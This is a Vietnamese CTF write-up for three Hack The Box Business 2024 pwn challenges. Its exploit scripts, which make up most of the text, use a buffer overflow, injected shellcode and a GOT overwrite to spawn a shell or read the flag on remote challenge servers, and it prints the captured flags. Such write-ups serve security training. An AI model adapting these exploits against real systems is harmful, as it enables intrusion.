# (writeup) HTB Business 2024

## Abyss

- bug buffer overflow (BOF) nằm ở khả năng ghi đè (overwrite) biến **user** và **pass**: vòng lặp copy bên dưới chỉ dừng khi gặp `'\0'`, không kiểm tra giới hạn `MAX_ARG_SIZE`, trong khi `buf` không được khởi tạo

```c
char pass[MAX_ARG_SIZE] = {0}; char user[MAX_ARG_SIZE] = {0}; char buf[MAX_ARG_SIZE]; // i = 5; while (buf[i] != '\0') { user[i - 5] = buf[i]; i++; } user[i - 5] = '\0'; // i = 5; while (buf[i] != '\0') { pass[i - 5] = buf[i]; i++; } pass[i - 5] = '\0';
```

- về căn bản, input sẽ không thoả mãn phép so sánh với USER:PASS ban đầu, nên ta return vào **cmd_read** cộng thêm một offset để bỏ qua điều kiện (đk) check

```c
if (!logged_in) { puts("Not logged in"); return; } //skip đống này
```

- script:

```py
#!/usr/bin/python3 from pwn import * exe = ELF('./abyss', checksec=False) context.binary = exe def GDB(): if not args.REMOTE: gdb.attach(p, gdbscript=''' b*main+470 b*cmd_login+155 b*cmd_read+66 c ''') input() info = lambda msg: log.info(msg) sla = lambda msg, data: p.sendlineafter(msg, data) sa = lambda msg, data: p.sendafter(msg, data) sl = lambda data: p.sendline(data) s = lambda data: p.send(data) if args.REMOTE: p = remote("83.136.248.205", 43375) else: p = process(exe.path) GDB() s(b'\0'*4) #cmd_login sleep(1) payload = b'USER ' + b'a'*3 payload += b'a'*8 payload += b'a'*6 + b'\x1c' + b'a' payload += b'a'*8 payload += b'a'*2 payload += p64(exe.sym.cmd_read + 66) s(payload) sleep(3) payload = b"PASS " + b"b"*507 s(payload) sleep(1) payload = b"./flag.txt\0" s(payload) p.interactive()
```

## Regularity

- simple shellcode
- script:

```py
#!/usr/bin/python3 from pwn import * context.binary = exe = ELF('./regularity',checksec=False) # p = process(exe.path) p = remote('94.237.57.110',38916) # gdb.attach(p,gdbscript=''' # b*0x000000000040104b # b*0x000000000040106e # c # ''') # input() jmp_rsi = 0x0000000000401041 payload = asm(shellcraft.sh()) payload = payload.ljust(0x100,b'a') payload += p64(jmp_rsi) p.send(payload) p.interactive() #HTB{juMp1nG_w1tH_tH3_r3gIsT3rS?_412f1e2607a8b400485195804f708b8b}
```

---

## No gadgets

- tricky hơn vì phải setup GOT cho chuẩn
![image](https://hackmd.io/_uploads/rydmDnS2C.png)

- tận dụng GOT của exit để return
- script:

```py
#!/usr/bin/python3 from pwn import * exe = ELF('./no_gadgets_patched', checksec=False) libc = ELF('./libc.so.6', checksec=False) context.binary = exe def GDB(): if not args.REMOTE: gdb.attach(p, gdbscript=''' b*main+87 b*main+158 c ''') input() info = lambda msg: log.info(msg) sla = lambda msg, data: p.sendlineafter(msg, data) sa = lambda msg, data: p.sendafter(msg, data) sl = lambda data: p.sendline(data) s = lambda data: p.send(data) if args.REMOTE: p = remote('94.237.63.201',48750) else: p = process(exe.path) setup = exe.sym.main+68 # GDB() payload = b'\0'*0x80 payload += p64(exe.got.puts+0x80) payload += p64(setup) sla(b'Data: ',payload) payload = p64(exe.plt.puts+6) + p64(exe.sym.main+122) payload += p64(exe.plt.printf+6) + p64(exe.plt.fgets+6) payload += p64(exe.plt.setvbuf+6) + p64(setup) sl(payload) p.recvuntil(b'scratch!\n') libc_leak = u64(p.recv(6)+b'\0\0') libc.address = libc_leak - libc.sym.puts info("libc leak: " + hex(libc_leak)) info("libc base: " + hex(libc.address)) binsh = next(libc.search(b'/bin/sh\0')) system = libc.sym.system payload = b'/bin/sh\0' + p64(system) sl(payload) p.interactive() #HTB{wh0_n3eD5_rD1_wH3n_Y0u_h@v3_rBp!!!_aad05d6f16e834630c56549dc7c44cc0}
```

---